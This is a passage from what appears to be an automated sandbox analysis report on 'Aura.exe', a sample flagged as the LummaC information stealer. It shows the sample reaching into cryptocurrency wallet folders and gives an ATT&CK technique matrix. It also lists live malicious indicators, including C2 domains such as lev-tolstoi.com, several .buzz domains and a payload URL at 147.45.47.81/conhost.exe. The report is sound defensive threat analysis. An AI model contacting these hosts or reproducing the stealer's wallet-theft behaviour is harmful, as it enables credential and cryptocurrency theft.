                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: Yara matchFile source: 00000002.00000003.1863800274.000000000341B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1842452334.0000000003427000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1842261348.0000000003424000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Aura.exe PID: 7412, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Aura.exe PID: 7412, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                21
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol41
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager241
                Security Software Discovery
                SMB/Windows Admin Shares3
                Clipboard Data
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS21
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem33
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Aura.exe34%ReversingLabsWin32.Exploit.LummaC
                Aura.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://lev-tolstoi.com/r100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apimv100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apil100%Avira URL Cloudmalware
                https://lev-tolstoi.com/pi(100%Avira URL Cloudmalware
                https://lev-tolstoi.com/api1100%Avira URL Cloudmalware
                https://store.steampower0%Avira URL Cloudsafe
                http://147.45.47.81/conhost.exeS0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                23.55.153.106
                truefalse
                  high
                  lev-tolstoi.com
                  104.21.66.86
                  truefalse
                    high
                    cashfuzysao.buzz
                    unknown
                    unknowntrue
                      unknown
                      scentniej.buzz
                      unknown
                      unknowntrue
                        unknown
                        inherineau.buzz
                        unknown
                        unknowntrue
                          unknown
                          prisonyfork.buzz
                          unknown
                          unknownfalse
                            high
                            rebuildeso.buzz
                            unknown
                            unknowntrue
                              unknown
                              appliacnesot.buzz
                              unknown
                              unknowntrue
                                unknown
                                hummskitnj.buzz
                                unknown
                                unknowntrue
                                  unknown
                                  mindhandru.buzz
                                  unknown
                                  unknownfalse
                                    high
                                    screwamusresz.buzz
                                    unknown
                                    unknowntrue
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      scentniej.buzzfalse
                                        high
                                        https://steamcommunity.com/profiles/76561199724331900false
                                          high
                                          rebuildeso.buzzfalse
                                            high
                                            appliacnesot.buzzfalse
                                              high
                                              screwamusresz.buzzfalse
                                                high
                                                cashfuzysao.buzzfalse
                                                  high
                                                  inherineau.buzzfalse
                                                    high
                                                    https://lev-tolstoi.com/apifalse
                                                      high
                                                      hummskitnj.buzzfalse
                                                        high
                                                        mindhandru.buzzfalse
                                                          high
                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://duckduckgo.com/chrome_newtabAura.exe, 00000002.00000003.1767549116.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1766979070.0000000005B6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://duckduckgo.com/ac/?q=Aura.exe, 00000002.00000003.1767549116.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1766979070.0000000005B6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://steamcommunity.com/?subsection=broadcastsAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://lev-tolstoi.com/rAura.exe, 00000002.00000003.1863854855.0000000003417000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Aura.exe, 00000002.00000003.1816553901.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://store.steampowered.com/subscriber_agreement/Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.valvesoftware.com/legal.htmAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://steamcommunity.com/dn.cAura.exe, 00000002.00000003.1739584373.00000000033D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiAura.exe, 00000002.00000003.1816553901.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6Aura.exe, 00000002.00000003.1739501843.000000000337A000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://lev-tolstoi.com/pi(Aura.exe, 00000002.00000003.1739584373.00000000033B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englAura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRiAura.exe, 00000002.00000003.1739501843.000000000337A000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Aura.exe, 00000002.00000003.1841956357.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1842228400.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1839023378.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://store.steampowerAura.exe, 00000002.00000002.3511215128.000000000336C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.entrust.net/rpa03Aura.exefalse
                                                                                                      high
                                                                                                      https://lev-tolstoi.com/Aura.exe, 00000002.00000003.1739584373.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000002.3511433189.0000000003415000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.2531562354.0000000003415000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739501843.0000000003382000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://store.steampowered.com/privacy_agreement/Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://store.steampowered.com/points/shop/Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Aura.exe, 00000002.00000003.1767549116.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1766979070.0000000005B6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0Aura.exe, 00000002.00000003.1815244598.0000000005B50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaAura.exe, 00000002.00000003.1841956357.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1842228400.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1839023378.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://imp.mt48.net/static?id=7RHzfOIXAura.exe, 00000002.00000003.1841956357.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1842228400.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1839023378.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://ocsp.rootca1.amazontrust.com0:Aura.exe, 00000002.00000003.1815244598.0000000005B50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Aura.exe, 00000002.00000003.1792800080.0000000005B77000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1792942781.0000000005B77000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1769020508.0000000005BC3000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1769094742.0000000005B77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orAura.exe, 00000002.00000002.3511215128.000000000336C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.ecosia.org/newtab/Aura.exe, 00000002.00000003.1767549116.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1766979070.0000000005B6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://steamcommunity.com/profiles/76561199724331900/inventory/Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brAura.exe, 00000002.00000003.1816181771.0000000005C4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://store.steampowered.com/privacy_agreement/Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://support.microsofAura.exe, 00000002.00000003.1769020508.0000000005BC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesAura.exe, 00000002.00000003.1769094742.0000000005B52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://crl.entrust.net/2048ca.crl0Aura.exefalse
                                                                                                                                              high
                                                                                                                                              https://www.entrust.net/rpa0Aura.exefalse
                                                                                                                                                high
                                                                                                                                                https://store.steampowered.com/about/Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://steamcommunity.com/my/wishlist/Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://ocsp.entrust.net03Aura.exefalse
                                                                                                                                                        high
                                                                                                                                                        http://ocsp.entrust.net02Aura.exefalse
                                                                                                                                                          high
                                                                                                                                                          https://help.steampowered.com/en/Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://steamcommunity.com/market/Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://store.steampowered.com/news/Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Aura.exe, 00000002.00000003.1767549116.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1766979070.0000000005B6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://store.steampowered.com/accoAura.exe, 00000002.00000002.3511215128.000000000336C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://store.steampowered.com/subscriber_agreement/Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000002.3511215128.000000000336C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Aura.exe, 00000002.00000003.1792800080.0000000005B77000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1792942781.0000000005B77000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1769020508.0000000005BC3000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1769094742.0000000005B77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://lev-tolstoi.com/apilAura.exe, 00000002.00000002.3511433189.00000000033F4000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.2531562354.00000000033F2000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.2531148527.00000000033D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                          unknown
                                                                                                                                                                          http://147.45.47.81/conhost.exeAura.exe, 00000002.00000002.3511215128.000000000336C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://lev-tolstoi.com/apimvAura.exe, 00000002.00000002.3511215128.000000000336C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                            unknown
                                                                                                                                                                            https://steamcommunity.com/discussions/Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://store.steampowered.com/stats/Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://store.steampowered.com/steam_refunds/Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://x1.c.lencr.org/0Aura.exe, 00000002.00000003.1815244598.0000000005B50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://x1.i.lencr.org/0Aura.exe, 00000002.00000003.1815244598.0000000005B50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallAura.exe, 00000002.00000003.1769094742.0000000005B52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAura.exe, 00000002.00000003.1767549116.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1766979070.0000000005B6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aAura.exe, 00000002.00000003.1739501843.000000000337A000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://crl.entrust.net/ts1ca.crl0Aura.exefalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://steamcommunity.com/workshop/Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://support.mozilla.org/products/firefoxgro.allAura.exe, 00000002.00000003.1816181771.0000000005C4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://store.steampowered.com/legal/Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engAura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
